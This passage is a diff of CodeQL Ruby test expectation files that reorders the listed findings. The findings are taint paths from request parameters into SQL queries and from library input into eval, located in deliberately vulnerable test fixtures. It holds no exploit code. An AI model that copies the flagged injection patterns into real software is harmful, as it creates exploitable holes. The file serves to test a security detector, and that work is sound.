@@ -1,52 +1,3 @@ -#select -| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | -| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | -| ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:30:16:30:24 | condition | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:30:16:30:24 | condition | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:42:30:42:44 | ...[...] 
| ActiveRecordInjection.rb:42:30:42:35 | call to params | ActiveRecordInjection.rb:42:30:42:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:42:30:42:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:46:18:46:32 | ...[...] | ActiveRecordInjection.rb:46:18:46:23 | call to params | ActiveRecordInjection.rb:46:18:46:32 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:46:18:46:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | ActiveRecordInjection.rb:50:29:50:34 | call to params | ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:50:29:50:34 | call to params | user-provided value | -| ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | ActiveRecordInjection.rb:55:30:55:35 | call to params | ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:55:30:55:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:59:21:59:45 | call to [] | ActiveRecordInjection.rb:59:31:59:36 | call to params | ActiveRecordInjection.rb:59:21:59:45 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:59:31:59:36 | call to params | user-provided value | -| ActiveRecordInjection.rb:64:22:64:46 | call to [] | ActiveRecordInjection.rb:64:32:64:37 | call to params | ActiveRecordInjection.rb:64:22:64:46 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:64:32:64:37 | call to params | user-provided value | -| ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | ActiveRecordInjection.rb:69:21:69:26 | call to params | ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:69:21:69:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | ActiveRecordInjection.rb:75:34:75:39 | call to params | ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:75:34:75:39 | call to params | user-provided value | -| ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | ActiveRecordInjection.rb:81:41:81:46 | call to params | ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:81:41:81:46 | call to params | user-provided value | -| ActiveRecordInjection.rb:86:23:86:35 | ...[...] | ActiveRecordInjection.rb:86:23:86:28 | call to params | ActiveRecordInjection.rb:86:23:86:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:86:23:86:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:90:17:90:31 | ...[...] | ActiveRecordInjection.rb:90:17:90:22 | call to params | ActiveRecordInjection.rb:90:17:90:31 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:90:17:90:22 | call to params | user-provided value | -| ActiveRecordInjection.rb:91:19:91:33 | ...[...] | ActiveRecordInjection.rb:91:19:91:24 | call to params | ActiveRecordInjection.rb:91:19:91:33 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:91:19:91:24 | call to params | user-provided value | -| ActiveRecordInjection.rb:95:18:95:35 | ...[...] | ActiveRecordInjection.rb:95:18:95:23 | call to params | ActiveRecordInjection.rb:95:18:95:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:95:18:95:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:99:21:99:35 | ...[...] | ActiveRecordInjection.rb:99:21:99:26 | call to params | ActiveRecordInjection.rb:99:21:99:35 | ...[...] | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:99:21:99:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | ActiveRecordInjection.rb:107:31:107:36 | call to params | ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:107:31:107:36 | call to params | user-provided value | -| ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | ActiveRecordInjection.rb:111:30:111:35 | call to params | ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:111:30:111:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:113:18:113:35 | ...[...] | ActiveRecordInjection.rb:113:18:113:23 | call to params | ActiveRecordInjection.rb:113:18:113:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:113:18:113:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:115:26:115:40 | ...[...] | ActiveRecordInjection.rb:115:26:115:31 | call to params | ActiveRecordInjection.rb:115:26:115:40 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:115:26:115:31 | call to params | user-provided value | -| ActiveRecordInjection.rb:116:28:116:42 | ...[...] | ActiveRecordInjection.rb:116:28:116:33 | call to params | ActiveRecordInjection.rb:116:28:116:42 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:116:28:116:33 | call to params | user-provided value | -| ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | ActiveRecordInjection.rb:117:30:117:35 | call to params | ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:117:30:117:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | ActiveRecordInjection.rb:118:32:118:37 | call to params | ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:118:32:118:37 | call to params | user-provided value | -| ActiveRecordInjection.rb:119:21:119:35 | ...[...] | ActiveRecordInjection.rb:119:21:119:26 | call to params | ActiveRecordInjection.rb:119:21:119:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:119:21:119:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:120:21:120:35 | ...[...] | ActiveRecordInjection.rb:120:21:120:26 | call to params | ActiveRecordInjection.rb:120:21:120:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:120:21:120:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:121:20:121:34 | ...[...] | ActiveRecordInjection.rb:121:20:121:25 | call to params | ActiveRecordInjection.rb:121:20:121:34 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:121:20:121:25 | call to params | user-provided value | -| ActiveRecordInjection.rb:123:23:123:47 | ...[...] | ActiveRecordInjection.rb:123:23:123:28 | call to params | ActiveRecordInjection.rb:123:23:123:47 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:123:23:123:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:127:19:127:30 | ...[...] | ActiveRecordInjection.rb:127:19:127:24 | call to params | ActiveRecordInjection.rb:127:19:127:30 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:127:19:127:24 | call to params | user-provided value | -| ActiveRecordInjection.rb:129:29:129:39 | ...[...] | ActiveRecordInjection.rb:129:29:129:34 | call to params | ActiveRecordInjection.rb:129:29:129:39 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:129:29:129:34 | call to params | user-provided value | -| ActiveRecordInjection.rb:141:20:141:32 | ... + ... | ActiveRecordInjection.rb:135:10:135:15 | call to params | ActiveRecordInjection.rb:141:20:141:32 | ... + ... | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:135:10:135:15 | call to params | user-provided value | -| ActiveRecordInjection.rb:174:21:174:44 | ...[...] | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:174:21:174:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | ActiveRecordInjection.rb:188:59:188:64 | call to params | ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:188:59:188:64 | call to params | user-provided value | -| ActiveRecordInjection.rb:201:37:201:41 | query | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:201:37:201:41 | query | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | ActiveRecordInjection.rb:222:29:222:34 | call to params | ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:222:29:222:34 | call to params | user-provided value | -| ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." 
| ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | -| ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | -| PgInjection.rb:14:15:14:18 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:14:15:14:18 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:15:21:15:24 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:15:21:15:24 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:20:22:20:25 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:20:22:20:25 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:21:28:21:31 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:21:28:21:31 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:32:29:32:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:32:29:32:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:44:29:44:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:44:29:44:32 | qry3 | This SQL query depends on a $@. 
| PgInjection.rb:6:12:6:17 | call to params | user-provided value | edges | ActiveRecordInjection.rb:8:25:8:28 | name | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | provenance | AdditionalTaintStep | | ActiveRecordInjection.rb:8:25:8:28 | name | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | provenance | AdditionalTaintStep | 
@@ -272,3 +223,52 @@ nodes | PgInjection.rb:43:5:43:8 | qry3 : String | semmle.label | qry3 : String | | PgInjection.rb:44:29:44:32 | qry3 | semmle.label | qry3 | subpaths +#select +| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | +| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | +| ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:30:16:30:24 | condition | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:30:16:30:24 | condition | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:42:30:42:44 | ...[...] | ActiveRecordInjection.rb:42:30:42:35 | call to params | ActiveRecordInjection.rb:42:30:42:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:42:30:42:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:46:18:46:32 | ...[...] | ActiveRecordInjection.rb:46:18:46:23 | call to params | ActiveRecordInjection.rb:46:18:46:32 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:46:18:46:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | ActiveRecordInjection.rb:50:29:50:34 | call to params | ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:50:29:50:34 | call to params | user-provided value | +| ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | ActiveRecordInjection.rb:55:30:55:35 | call to params | ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:55:30:55:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:59:21:59:45 | call to [] | ActiveRecordInjection.rb:59:31:59:36 | call to params | ActiveRecordInjection.rb:59:21:59:45 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:59:31:59:36 | call to params | user-provided value | +| ActiveRecordInjection.rb:64:22:64:46 | call to [] | ActiveRecordInjection.rb:64:32:64:37 | call to params | ActiveRecordInjection.rb:64:22:64:46 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:64:32:64:37 | call to params | user-provided value | +| ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | ActiveRecordInjection.rb:69:21:69:26 | call to params | ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:69:21:69:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | ActiveRecordInjection.rb:75:34:75:39 | call to params | ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:75:34:75:39 | call to params | user-provided value | +| ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | ActiveRecordInjection.rb:81:41:81:46 | call to params | ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:81:41:81:46 | call to params | user-provided value | +| ActiveRecordInjection.rb:86:23:86:35 | ...[...] | ActiveRecordInjection.rb:86:23:86:28 | call to params | ActiveRecordInjection.rb:86:23:86:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:86:23:86:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:90:17:90:31 | ...[...] | ActiveRecordInjection.rb:90:17:90:22 | call to params | ActiveRecordInjection.rb:90:17:90:31 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:90:17:90:22 | call to params | user-provided value | +| ActiveRecordInjection.rb:91:19:91:33 | ...[...] | ActiveRecordInjection.rb:91:19:91:24 | call to params | ActiveRecordInjection.rb:91:19:91:33 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:91:19:91:24 | call to params | user-provided value | +| ActiveRecordInjection.rb:95:18:95:35 | ...[...] | ActiveRecordInjection.rb:95:18:95:23 | call to params | ActiveRecordInjection.rb:95:18:95:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:95:18:95:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:99:21:99:35 | ...[...] | ActiveRecordInjection.rb:99:21:99:26 | call to params | ActiveRecordInjection.rb:99:21:99:35 | ...[...] | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:99:21:99:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | ActiveRecordInjection.rb:107:31:107:36 | call to params | ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:107:31:107:36 | call to params | user-provided value | +| ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | ActiveRecordInjection.rb:111:30:111:35 | call to params | ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:111:30:111:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:113:18:113:35 | ...[...] | ActiveRecordInjection.rb:113:18:113:23 | call to params | ActiveRecordInjection.rb:113:18:113:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:113:18:113:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:115:26:115:40 | ...[...] | ActiveRecordInjection.rb:115:26:115:31 | call to params | ActiveRecordInjection.rb:115:26:115:40 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:115:26:115:31 | call to params | user-provided value | +| ActiveRecordInjection.rb:116:28:116:42 | ...[...] | ActiveRecordInjection.rb:116:28:116:33 | call to params | ActiveRecordInjection.rb:116:28:116:42 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:116:28:116:33 | call to params | user-provided value | +| ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | ActiveRecordInjection.rb:117:30:117:35 | call to params | ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:117:30:117:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | ActiveRecordInjection.rb:118:32:118:37 | call to params | ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:118:32:118:37 | call to params | user-provided value | +| ActiveRecordInjection.rb:119:21:119:35 | ...[...] | ActiveRecordInjection.rb:119:21:119:26 | call to params | ActiveRecordInjection.rb:119:21:119:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:119:21:119:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:120:21:120:35 | ...[...] | ActiveRecordInjection.rb:120:21:120:26 | call to params | ActiveRecordInjection.rb:120:21:120:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:120:21:120:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:121:20:121:34 | ...[...] | ActiveRecordInjection.rb:121:20:121:25 | call to params | ActiveRecordInjection.rb:121:20:121:34 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:121:20:121:25 | call to params | user-provided value | +| ActiveRecordInjection.rb:123:23:123:47 | ...[...] | ActiveRecordInjection.rb:123:23:123:28 | call to params | ActiveRecordInjection.rb:123:23:123:47 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:123:23:123:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:127:19:127:30 | ...[...] | ActiveRecordInjection.rb:127:19:127:24 | call to params | ActiveRecordInjection.rb:127:19:127:30 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:127:19:127:24 | call to params | user-provided value | +| ActiveRecordInjection.rb:129:29:129:39 | ...[...] | ActiveRecordInjection.rb:129:29:129:34 | call to params | ActiveRecordInjection.rb:129:29:129:39 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:129:29:129:34 | call to params | user-provided value | +| ActiveRecordInjection.rb:141:20:141:32 | ... + ... | ActiveRecordInjection.rb:135:10:135:15 | call to params | ActiveRecordInjection.rb:141:20:141:32 | ... + ... | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:135:10:135:15 | call to params | user-provided value | +| ActiveRecordInjection.rb:174:21:174:44 | ...[...] | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:174:21:174:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | ActiveRecordInjection.rb:188:59:188:64 | call to params | ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:188:59:188:64 | call to params | user-provided value | +| ActiveRecordInjection.rb:201:37:201:41 | query | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:201:37:201:41 | query | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | ActiveRecordInjection.rb:222:29:222:34 | call to params | ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:222:29:222:34 | call to params | user-provided value | +| ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." 
| ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | +| ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | +| PgInjection.rb:14:15:14:18 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:14:15:14:18 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:15:21:15:24 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:15:21:15:24 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:20:22:20:25 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:20:22:20:25 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:21:28:21:31 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:21:28:21:31 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:32:29:32:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:32:29:32:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:44:29:44:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:44:29:44:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | 
diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected index 8232d96d8b76..eae7c03a716e 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected 
@@ -1,15 +1,3 @@ -#select -| impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | -| impl/unsafeCode.rb:8:30:8:30 | x | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:7:12:7:12 | x | library input | impl/unsafeCode.rb:8:5:8:32 | call to eval | interpreted as code | -| impl/unsafeCode.rb:13:33:13:33 | x | impl/unsafeCode.rb:12:12:12:12 | x | impl/unsafeCode.rb:13:33:13:33 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:12:12:12:12 | x | library input | impl/unsafeCode.rb:13:5:13:35 | call to eval | interpreted as code | -| impl/unsafeCode.rb:29:10:29:15 | my_arr | impl/unsafeCode.rb:28:17:28:22 | my_arr | impl/unsafeCode.rb:29:10:29:15 | my_arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:28:17:28:22 | my_arr | library input | impl/unsafeCode.rb:29:5:29:27 | call to eval | interpreted as code | -| impl/unsafeCode.rb:34:10:34:12 | arr | impl/unsafeCode.rb:32:21:32:21 | x | impl/unsafeCode.rb:34:10:34:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:32:21:32:21 | x | library input | impl/unsafeCode.rb:34:5:34:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:40:10:40:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:40:10:40:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:40:5:40:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:44:10:44:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:44:10:44:12 | arr | This array which depends on $@ is later $@. 
